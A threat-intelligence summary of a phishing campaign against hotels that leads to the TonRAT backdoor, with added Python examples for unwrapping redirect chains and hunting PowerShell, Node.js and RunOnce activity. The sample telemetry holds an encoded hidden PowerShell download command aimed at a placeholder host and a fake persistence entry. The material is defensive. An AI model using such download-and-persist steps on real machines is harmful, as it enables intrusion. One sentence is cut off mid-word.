Essential Insights
- Attackers send the lure through Calendly's legitimate mail infrastructure, so SPF, DKIM, and DMARC pass, and hide the download behind a multi-hop chain of Calendly and Google redirects that ends in a malicious ZIP file.
- The payload executes PowerShell to decode URLs, download a Node.js environment, and deploy a custom backdoor (TonRAT) that communicates via the TON blockchain, evading static detection.
- Compromised hotel systems are at risk of persistent access through multiple persistence paths, with potential for prolonged, stealthy data theft, though the final payload has not been identified.
Threat Overview, Attack Techniques, and Targets
Microsoft has identified an active phishing campaign that has targeted hotels and hospitality organizations in Europe and Asia since April 2026. The attackers use photo-themed ZIP files to deliver malware. Microsoft has not attributed the activity to a specific threat group. The phishing emails impersonate a “Booking Manager (via Calendly)” and mention guest complaints, health inspections, and reviews. The emails are written in Japanese, Danish, and Dutch but contain no personalized details, which points to mass mailing rather than targeted spear phishing.
Delivery relies on a multi-hop routing chain. The emails pass SPF, DKIM, and DMARC because they are sent through infrastructure that is authorized to send on the relay's behalf, such as Calendly and Google; the checks validate the relaying service, not the intent of the person who booked the invite. After clicking a link, victims are redirected through multiple services, which makes the chain harder to trace and to block at any single hop. The final step involves downloading a ZIP file named “photo-
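Because the authentication results are clean, the useful triage signal is the link itself: how many redirectors it passes through and what the final hop serves. The following added example (not code from Microsoft's report) unwraps nested redirect links statically, without fetching anything, and flags a chain that starts on a trusted redirector and ends in an archive download. The redirect format (the next hop carried as a query parameter such as Google's `q=`), the hostnames `track.example.com` and `files.example.net`, the file name `guest-photos.zip`, and the `TRUSTED_REDIRECTORS` set are assumptions constructed for the example.

```python
from urllib.parse import parse_qs, quote, urlparse

# Assumption: hosts whose open redirects the campaign is known to abuse.
TRUSTED_REDIRECTORS = {"www.google.com", "calendly.com"}
ARCHIVE_SUFFIXES = (".zip",)  # the campaign delivers ZIP files


def next_hop(url):
    """Return the first query-parameter value that is itself an absolute URL, else None."""
    for values in parse_qs(urlparse(url).query).values():
        for value in values:
            if value.lower().startswith(("http://", "https://")):
                return value
    return None


def unwrap(url, max_hops=10):
    """Follow redirect parameters statically; stop on a loop or at max_hops."""
    hops = [url]
    seen = {url}
    while len(hops) <= max_hops:
        nxt = next_hop(hops[-1])
        if nxt is None or nxt in seen:
            break
        hops.append(nxt)
        seen.add(nxt)
    return hops


def triage(url):
    """Unwrap the link and report why it deserves analyst attention."""
    hops = unwrap(url)
    hosts = [urlparse(h).hostname or "" for h in hops]
    final_path = urlparse(hops[-1]).path.lower()
    findings = []
    if len(hops) > 1 and hosts[0] in TRUSTED_REDIRECTORS:
        findings.append(
            f"link hides behind trusted redirector {hosts[0]} ({len(hops) - 1} further hop(s))"
        )
    if final_path.endswith(ARCHIVE_SUFFIXES):
        findings.append(f"final hop serves an archive: {hops[-1]}")
    return {"hops": hops, "hosts": hosts, "findings": findings}


def build_sample_link():
    """Constructed lure: Google redirect -> tracking redirect -> ZIP download."""
    final = "https://files.example.net/dl/guest-photos.zip"
    middle = "https://track.example.com/r?u=" + quote(final, safe="")
    return "https://www.google.com/url?q=" + quote(middle, safe="")


if __name__ == "__main__":
    result = triage(build_sample_link())
    for i, hop in enumerate(result["hops"]):
        print(f"hop {i}: {hop}")
    for finding in result["findings"]:
        print("FINDING:", finding)
```

`parse_qs` percent-decodes each hop as it is extracted, so nested encoding (the inner URL encoded once per wrapping redirector) unwraps one layer per iteration. The `seen` set and `max_hops` cap prevent a crafted self-referencing link from looping the triage tool.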
The malware used in this campaign is TonRAT. It communicates through the TON blockchain API and establishes encrypted WebSocket channels, connecting to a range of IP addresses on non-standard ports. It also performs headless browser automation and geolocation checks. Microsoft has not confirmed data theft or ransomware at this time.
Impact, Security Implications, and Remediation Guidance
The impact of this campaign remains unclear. The malware could enable unauthorized access to hotel systems, and its persistence makes cleanup difficult: both persistence paths, the RunOnce registry entry and the dropped Node.js files, must be removed, since leaving either one in place allows the backdoor to return. The campaign's goal is not yet fully understood, and no final payload has been identified.
The security implications include ongoing risks of unauthorized access and potential data compromise. The malware's use of blockchain APIs and encrypted channels complicates detection and blocking, because its command traffic blends into legitimate-looking HTTPS and WebSocket connections. Organizations handling hotel reservations, front-desk operations, and related systems should prioritize monitoring for the behaviours this campaign exhibits: PowerShell launched from the contents of a downloaded archive, a Node.js runtime executing from a user-writable location, new RunOnce entries pointing at such files, and outbound connections to TON blockchain endpoints or WebSocket services on non-standard ports.
Because Microsoft's specific remediation steps are not reproduced here, organizations should contact their security vendors or relevant authorities for detailed guidance. Ensuring detection coverage for the behaviours above and removing every persistence component, not just the running process, is crucial.
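The execution chain the report describes (encoded PowerShell fetching a URL, a Node.js runtime staged in a user-writable folder, a RunOnce entry pointing at it, and outbound connections on non-standard ports) can be expressed as host-level hunting rules. The following added example (not Microsoft's detection logic) runs such rules over a handful of constructed Sysmon-style events and lists the persistence components a responder must remove. The event layout, the `frontdesk` user, the `Updater` RunOnce value name, the `files.example.net` host, and port 8443 are all assumptions made up for the example.

```python
import base64
import re

# Paths a standard user can write to; malware staged here rather than in Program Files.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\", re.IGNORECASE)
RUNONCE = re.compile(r"\\CurrentVersion\\RunOnce\\", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
EXPECTED_PORTS = {80, 443}


def decode_encoded_command(cmdline):
    """Decode PowerShell's -EncodedCommand argument, or return None if absent/invalid."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Apply the hunting rules; return findings plus the artefacts to remove."""
    findings, cleanup, staged_node = [], [], set()
    for ev in events:
        image = ev.get("image", "")
        kind = ev["event"]
        if kind == "ProcessCreate":
            if image.lower().endswith("powershell.exe"):
                decoded = decode_encoded_command(ev.get("cmdline", ""))
                if decoded and re.search(r"https?://", decoded, re.IGNORECASE):
                    findings.append(f"encoded PowerShell fetching a URL: {decoded.strip()}")
            if image.lower().endswith("node.exe") and USER_WRITABLE.search(image):
                findings.append(f"Node.js runtime in user-writable path: {image} (parent {ev.get('parent')})")
                staged_node.add(image.lower())
                cleanup.append(("file", image.rsplit("\\", 1)[0]))  # the staged runtime directory
        elif kind == "RegistryValueSet":
            target, details = ev.get("target", ""), ev.get("details", "")
            if RUNONCE.search(target) and USER_WRITABLE.search(details):
                findings.append(f"RunOnce persistence to user-writable binary: {target} -> {details}")
                cleanup.append(("registry", target))
        elif kind == "NetworkConnect":
            if image.lower() in staged_node and ev.get("dst_port") not in EXPECTED_PORTS:
                findings.append(f"staged Node.js connecting to {ev.get('dst_ip')}:{ev.get('dst_port')}")
    return {"findings": findings, "cleanup": cleanup}


# Constructed sample telemetry (not real IOCs from the report).
NODE = r"C:\Users\frontdesk\AppData\Local\Temp\node\node.exe"
_SCRIPT = r"iwr https://files.example.net/dl/node.zip -OutFile $env:TEMP\node.zip"
_ENC = base64.b64encode(_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe -w hidden -enc " + _ENC},
    {"event": "ProcessCreate", "image": NODE, "parent": "powershell.exe", "cmdline": "node.exe app.js"},
    {"event": "ProcessCreate", "image": r"C:\Program Files\nodejs\node.exe", "parent": "cmd.exe",
     "cmdline": "node.exe build.js"},  # benign: vendor install location
    {"event": "RegistryValueSet", "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Updater",
     "details": NODE + r" C:\Users\frontdesk\AppData\Local\Temp\node\app.js"},
    {"event": "NetworkConnect", "image": NODE, "dst_ip": "192.0.2.10", "dst_port": 8443},
    {"event": "NetworkConnect", "image": r"C:\Program Files\nodejs\node.exe", "dst_ip": "192.0.2.20", "dst_port": 8443},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "cmd.exe", "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},  # benign
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for finding in result["findings"]:
        print("FINDING:", finding)
    for kind, item in result["cleanup"]:
        print(f"REMOVE [{kind}]: {item}")
```

The cleanup list deliberately pairs the registry value with the staged runtime directory: deleting only the RunOnce value leaves the Node.js files for a second-stage to relaunch, and deleting only the files leaves a dangling RunOnce entry that tells the responder nothing about what else may have been set. The benign vendor-installed `node.exe` and the administrator's unencoded script show that the rules key on location and encoding, not on the tool names alone.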
